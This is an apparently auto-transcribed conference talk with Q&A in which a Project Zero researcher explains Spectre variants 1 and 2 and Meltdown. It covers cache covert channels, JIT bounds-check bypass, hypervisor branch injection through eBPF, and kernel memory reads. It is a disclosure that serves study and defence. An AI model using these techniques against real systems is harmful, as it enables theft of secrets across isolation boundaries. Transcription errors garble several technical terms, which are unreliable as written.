 Okay. So I'm Jan Horn from Google Project Zero, and I'm presenting slides that were prepared together with Paul Kochar, Daniel Genken, and Yuval Jarom. And I'm speaking on Spectrum Meltdown, how you can leak data out of speculative execution. This work involves a lot of other researchers. So for Meltdown, there were Werner Haas and Thomas Presser from Cybers Technology, Daniel Groß, Moritz Lebsch, Stefan Mangardt, Michael Schwarz, Anders Vogt was credited by the other researchers for early contributions of ideas, and Mike Hamburg from Rambos was also involved. Okay. So, basic outline, I'm first going to present shared concepts for the attack variants, then I'm going to give an overview over the three variants and then explain, give a little overview of how each of the variants works. Okay. So, basic recap, there are covert channels in modern CPUs, and in particular I'm going to look at the cache-based covert channel, which is that basically the pattern of memory accesses you perform affects the state of the data cache, and then subsequent data, subsequent memory accesses have timing that depends on the data cache state. So this means that by measuring the timings of memory accesses, you can get information about the memory addresses that were accessed previously. So there are a bunch of attacks you can do with that. And here I'm just going to be talking about sudden reload, because that's the simplest one. Normally this is used as a side channel to attack things like cryptographic implantations and leaky and stuff, but here it makes more sense to conceptualize it as a covert channel. I should note that there are other covert channels, so if you want to mitigate these issues, just mitigating the cache-based covert channel probably won't cut it. Okay. So, okay, the cars are working pretty well. Okay. Basically, what are speculative execution out of order execution branch prediction pipeline and what does that mean? So basically the idea is that the processor can execute instructions in parallel and even in a different order than they are in the machine code, and that the processor can also predict branches before the target of a branch is known. So in this code example, you can in the first line see two accesses to a foo array. And if you look at the machine code, it looks as if the CPU would first load the value of the first value foo array at index one and then load the value of foo array at index two. But memory accesses can have quite some high latency, and so the processor can perform these two memory accesses in parallel more or less so that the total execution time of this first line goes down. Then next we can see that there's a branch where depending on the result of the expression in the first line, we're going to either execute line two or line four. And again, there could be high latencies both in line one and line two. And so the processor can predict that we're going to be executing line two even before the condition in line one has been evaluated. And then the processor can go ahead and even do the third memory access in parallel together with the first two memory accesses just to make things even quicker. Okay. So of course, this can go wrong because we can predict that we're going to take to execute the one line and actually we're going to have to execute the other one. So that's mis-speculation. This can be caused not just by incorrect prediction of branches, but also by exceptions that occur in the middle of a series of instructions. So for example, if one instruction causes a page fault and you've already started executing the subsequent instructions, you're going to have to discard the changes made by those instructions. So this is implemented by preserving the old register states while executing instructions speculatively so you can roll back the state of registers and memory writes are buffered inside the processor core and not written back to memory until the CPU is sure that they should actually be executed so that you don't have to go back to the memory and undo changes to memory or stuff like that. But importantly, changes to the data cache are not restored because the data cache is not something that you really see architecturally when you write a normal program and actually keeping stuff in the cache helps make things run faster. So cache modifications are not restored. And this means that you get a cover channel out of mis-speculation. So if you have either a branch that's mis-predicted or instruction that actually falls and the CPU continues executing down here on the left side to the predicted target, then you have these transient instructions that will be rolled back later. But from inside these transient instructions, you can send on a cache-based cover channel. And then when the CPU has rolled back your transient instructions and starts executing with architectural control flow, the stuff that's actually supposed to happen according to the documentation, then you can start doing timings there and using those to read from the cache-based cover channel. So this means you get a cover channel out of these transient instructions and can leak data to which you have access in these transient instructions. Okay, so a quick overview of the three variants. The naming is a bit confusing because there are multiple people supplying names. So we have the first two variants that are named Aspector and the third variant that is named Meltdown. And the first variant can more or less be characterized as bypassing bounce checks and primarily affects things like interoperators and jits, although that's not necessarily all you can do with it. The second variant is an injection of branch targets and primarily affects things like kernels and hypervisors, but again theoretically also other things. And Meltdown just affects operating system kernels and software that architecturally behaves like an operating system kernel. Okay, so let's start looking at the first variant. So here we have a conditional branch where we have this attacker-controlled X that is highlighted in red that is compared to an array size and only if the X is below the array size we actually do an access. So if you look at this architecturally, it all looks fine. If X is too big, we just don't execute the second line. But if you look at this with the knowledge of the speculation that processes do and this branch prediction, then you can see that if an attacker first trains the branch prediction to assume that X will be smaller than this array size, and then an attacker makes sure that the cache line that contains the size of the array is evicted to main memory so that when the processor tries to evaluate the condition of the first line, it has to go back to main memory and wait for the memory access to finish and so on before it can actually resolve the branch in the first line. Then an attacker can use that to cause the second line to be executed as transient instructions and then you can see that here in these transient instructions, you will have an out-of-bounds memory access into the first array. So you read memory, but it's out-of-bounds and belongs to something completely else in your process. Then you multiply that with 256 and use it as an index into a second array from what you read. So this means that every distinct value that could be at this out-of-bounds position out-of-bounds from array one maps to a different cache line that is used for the access to array two, which means that later, you can leak exactly what the value was by measuring which cache line in array two becomes fast. Okay, so in practice, where's this relevant? So one interesting example are JavaScript sandboxes. So JavaScript code runs in a sandbox that tries to enforce memory safety. So you're not permitted to just read arbitrary pointer dereference. You're not permitted to read arbitrary memory, not permitted to dereference pointers, and you can't just access arrays out-of-bounds and so on. But the browser runs a JavaScript from untrusted websites. So we can try to use JavaScript to create a construct like the one we saw on the last slide. The JavaScript engine will have to either interpret code or compile it and will insert bounce checks and things like that to ensure that there are safety memory, safety, so on. But with the speculative execution, we can potentially bypass the safety checks and access memory that actually should not be accessible to us. So here's a code example of how that looks in JavaScript. You can see that it more or less looks like the code we saw previously. So you again have this pattern of a comparison, then a first array access mapping and then mapping to a position in a second array. But there are some differences. So again, we have this index that will be in-bounds to train the branch prediction and then out-of-bounds to actually read out-of-bounds memory. We again have an array length to which we're comparing where we want the length to not be in the processor cache when we're actually doing the attack so that the processor transiently executes lines two, three, and four before the condition line one has been resolved. One thing to note here is that, of course, the JavaScript JIT engine will itself make sure that we are not accessing things out-of-bounds, but we don't want the code that the JIT engine is going to generate if it thinks it has to generate this check for us. So we do the check ourselves. We do the actual memory out-of-bounds read. Both in line two and in line three, you can see these all zeros. They're just tricks to make the JavaScript optimizer generate more optimal code so that the attack works better. Here you can see that we are ending the value that we read with a constant. This serves to show to the JIT engine that there's a maximum bound on this value and the JIT engine does not have to insert its own bounce checks that might make things slower for us. Again, we have this multiplication to map the value to a lot of different cache lines depending on what the value is, and we access the table into which we're going to leak the data. And last, because this is a JavaScript engine, and JavaScript engines love to optimize things away, we're going to have to provide some output where the JIT engine can't prove that it won't be used. So that's what the local junk variable is for. Okay, so variant two. The basic idea here is we have branch prediction in the processor, and this branch prediction can both predict the conditional jumps that we've seen before, but it can also predict indirect calls, so calls to instructions where the target instruction pointer is coming, for example, from a location memory or so. And this branch prediction uses a table called the branch target buffer, and at least on an Intel Haswell processor, it seems to be indexed and tagged by a partial virtual address and a fingerprint of recent branch history. Now, the thing about branch prediction is, as we've seen, it's expected to sometimes be wrong, and this means that unlike in the case of, for example, a data cache that always has to return correct information, a branch predictor can be designed, the branch target buffer can be designed so that it can sometimes return invalid data. You just shouldn't do it too often because then you heard performance. So the branch target buffer is therefore not always uniquely tagged, and for example, many branch target buffer implementations, like in the Intel Haswell processor, do not tag by security domain, like for example, whether you're in the kernel or in user space or whether you're inside or outside of VM. So that was prior research that used this to break address-based layout randomization across security domains. So you can, for example, have two processes running in user space, and then the victim process just runs some code that has branches in it, and then the attacker code does timing of some branches and can use that to infer things about the state of the branch target buffer, which reveals where the code is located in the victim context. Then you can also do that from inside a virtualization guest to figure out where the hypervisor is located in host memory. And the new thing here is that you can also do this the other way around. So instead of using the branch target buffer to leak data from the victim to the attacker, you can use it to inject branches from the attacker to the victim. So if you can insert entries into the branch target buffer, you can cause the target context to start executing transient instructions in some implementations completely controlled address. Yeah, so I wrote a pock for this against the KVM hypervisor. So this is just a very rough overview, but basically the idea is first you start by breaking the hypervisor ASLR using the branch target buffer leak of address information as shown in prior research. Then you try to misdirect the first indirect branch that occurs after a guest exit. So when you switch from the guest back into hypervisor context and you flash the cache line that contains the memory operand to the indirect call, such that the indirect call takes a couple of hundred cycles to resolve, during which you can get a transient execution at an arbitrary address. Now one thing that helps with the attack here is that the state of the virtualization guest, the register state of the virtualization guest becomes the register state of the hypervisor when you switch from the guest to the hypervisor. All the general purpose registers state the same. Then of course the hypervisor is going to start using these registers itself, which will clobber most of them, but at least in some kernel builds you can see that at the time of the first indirect call, you still have control over like four registers, which you can use to get more control over what the code you're misdirecting execution to in the hypervisor will actually end up doing. Also, guest memory is mapped in the hypervisor. So while the hypervisor and the guest don't share their virtual address space, the hypervisor has a separate mapping of all the pages that you have in the guest. So this means that if you can figure out where this mapping in the hypervisor is, you can place guest control data in memory in the hypervisor and then reference this memory from the instructions that you're transiently executing to get even more control over the execution in the hypervisor. And one particular thing you can do with that in the case of KVM is that there's this EBPF bytecode interpreter in the hypervisor, which basically allows you to supply, which basically has this function that you see at the bottom of the screen called BPFProgram. And as a second argument, it takes an array of instructions in some bytecode format and it will then run those instructions. So with this code gadget that you see above that, you can first get control of the second argument register RSI using the register R9, which you already control. And then you can use your control over the register R8 and over memory to provide the destination of the call. So then that lets you run arbitrary bytecode in the hypervisor during transient execution. Then you can use the bytecode to read a memory and leak the data into the cache and then leak the data out of the cache in the guest. Okay, so now meltdown or variant three. So here on the right-hand side, you can see a depiction of the virtual memory layout roughly of a user space process. And you can see that the address space, the virtual address space of the user space and the kernel space is shared, at least on, for example, X86. So while the user space does not actually have permissions to access the kernel mappings, the kernel mappings are present in the same page tables that user space is using and that's a bit in the page table that says whether you're supposed to be able to access some memory from user space or just from kernel space. And now we're just going to use this more or less the same pattern that we were already using for variant one, where we start by dereferencing some pointer. But importantly, in this case, the pointer points, as you can see on the right side, into kernel space, specifically in this mapping of all physical memory that calls tend to have. And we just try to do this read. Obviously, this instruction will not be able to architecturally execute completely because, well, this is a call memory and we can't just architecturally access call memory. But it turns out that in, on at least some processors, you can continue execution in transient instructions after such a reference to call memory and the value that the read is returning is accessible from the following transient instructions. So again, we take this value, we map it to values that are sparser so that each different value maps to a different cache line use it to access this array two to leak the data into the cache. Then execution of this will be terminated because we accessed a call memory, but at this point it's too late and we can use architectural attack code to leak the data back out of the cache of this array two and figure out what the value was. So it's not entirely clear yet what's going on in the variant three attack. So there seems to be some race condition involved in a privilege check in the processor and that's a pretty straightforward result that you can leak some cache data from the kernel. So in particular from the L1 data cache also, but the TU guards, people have also figured out that you can read uncached data. It's just not entirely clear yet what influences how well that attack works precisely. One last thing you saw in this slide that we were doing this dereference of a kernel address and I said that this is not going to architecturally execute the processor will raise a page fault because we are accessing an address we're not supposed to be able to access. So there are three ways you can deal with that because normally the kernel will just then terminate your program when you get the page fault, but you can use a signal handler so you can just tell the operating system, hey, when I get a page fault, I would like to continue execution. Obviously that's a very noisy approach, but it works. The second way is to use the TSX instructions that you have on some processors where you can before you do the actual access to a kernel pointer, you can tell the processor that if something bad happens, it should just roll back the execution state and do something different for you. Or the last option is to put a mispredicted branch in front of the faulting instruction so that even the faulting instruction itself is just running as a transient instruction and not actually being executed architecturally. Okay, so basically in conclusion, there are COVID channels in CPUs and they're useful for more than just transferring secrets between trust domains that are supposed to be isolated from each other. And while most security issues are correctness issues, not all security issues are correctness issues. Okay, here are some references. First to the various research papers and blog posts about this issue and then some prior research that I mentioned in this talk. Yeah, and I'm done. Okay. Okay. So we actually have plenty of time for questions so I would invite people to come and take the mic if there's something you'd like to ask. And if you're planning on speaking in the, my goodness, the line is forming over here for the lightning talk session. Okay, let me lead off the questioning by asking Jan a little bit about the, as much as you can say, about the disclosure process that was followed here and how the different groups were interacting with each other throughout this process. I think that's an interesting part of the story which you haven't really touched on in your presentation. Yeah, okay. So we, Project Zero reported this issue to Intel, AMD and ARM at the start of June last year. And I haven't, I didn't hear from the other researchers until sometime later in the year when Intel contacted me and said that they'd been contacted by other security researchers. Okay. So you're playing that one with a straight bat. I think it's in, but that's fine. There's questions from the mic, Matt Watson. So I would just like to ask, are there, you didn't really talk about case coherency where if you have a multi-processor system, are these transient instructions going to generate changes in the cache of other processors as well? You mean, so you mean whether they're going to have effects with, for example, a cache line that was exclusive becomes a shared cache line. I would think so, but I'm not sure whether I've actually tested that. Okay. This is a pretty significant attack and quite hard to mitigate. I was wondering if you think that this is the kind of thing that as vendors develop patches and patches get rolled out, is it just the kind of thing that gets simply solved or do you think it's pretty much the end of civilization as we know it? Well, I think, and so variant one is pretty, seems to be pretty easy to mitigate. It looks so from what I've conceived from the process of vendors, it looks like the Kaiser patches that are now called KPDI that Daniel Goose and other researchers developed are going to solve that pretty well. The other variants I'm not so sure about. Hi, thank you for your talk. Nevertheless, that's a cool question. What was you and your colleagues reaction when you first stumbled across the spectrum meltdown? Good question. I was like half a year ago, so I'm not entirely sure anymore. I think it was a relatively gradual thing. So it wasn't as if we had suddenly stumbled over the whole thing at once. So you only, with time, you saw what it means. Only with time, it became clear what it means. Okay, and how has your life been affected by the media leaks in the recent week? Like, has it changed? I don't really want to comment on that. Okay, thank you. So speaking of media leaks, it's very unclear in some of the media articles that have been written exactly which processes are vulnerable to which variants of the attack. So as far as I can tell, everything works on Intel. But what about the arm? Do all three variants work on arms as well and stuff like that? So ARM actually published a website where the table clearly says that specific processes, which specific processes are vulnerable to which specific variant? Okay, thank you. What does this mean for trusted execution environments such as Intel's SGX? Do you have any thoughts on that? I've been wondering about that, but I didn't really look into it. So I can comment on that. Yeah, there is something going around on Twitter, but I have no idea. Do you have any thoughts on how these flaws existed for, I presume, a couple of years and then all of a sudden two or three different research groups sort of all stumbled across them within some short time interval? Seems sort of interesting, like. So it seems to me that the topic of cash attacks has been coming up in the last years quite frequently. So this thing that there are cash side channels that you can use to perform such attacks. So for me personally, it's something that I've become more aware of in the last couple of years, I think, and without that, I probably wouldn't have stumbled over it. I'm not sure whether that's true for the other researchers. I think Paul Kochar in particular probably has a lot of experience with that prior. You alluded to this being one of a class of side channel attacks. Do you have any further pointers to what areas of research are likely to be fruitful there? So I haven't really looked into that much, but there are some papers where you can see, for example, things on where not just the cash timing, but also the timing of DRAM accesses differs based on previous memory accesses. And you could also try to, I think Paul Kochar pointed out that you could try to time the length of the transient execution instead of trying to, afterwards trying to leak things from the cash. And there's also some research, I think, from Sophie Dantuan about leaking between hyperthreads information about which execution units are being used by the other hyperthreads because hyperthreads share the execution units. And so there's some scheduling going on. And so that means that you can leak through the behavior of how the CPU schedules things out of order, what the other threat is doing on a relatively coarse level. Okay, I think there's no more questions. One more up here. A great point at which we should end. Oh, sorry. Questions upstairs, where? Okay, go ahead. Surprise. So paradigmatic attacks like this tend to generate hasty fixes that are broken pretty quickly thereafter when the next paper season comes around. What do you think, especially for something like this, vendors can do to make sure that their fixes address more generally the underlying problem rather than sort of paper over the existing attacks? Well, I mean, that's on the process of vendors. They are the only ones who are really in the position to be able to completely review what the computer is doing. And so I don't think that's something I could, for example, particularly help with. Thank you. Okay, I think that's a great place to stop. So let's thank the speaker again. Thank you very much.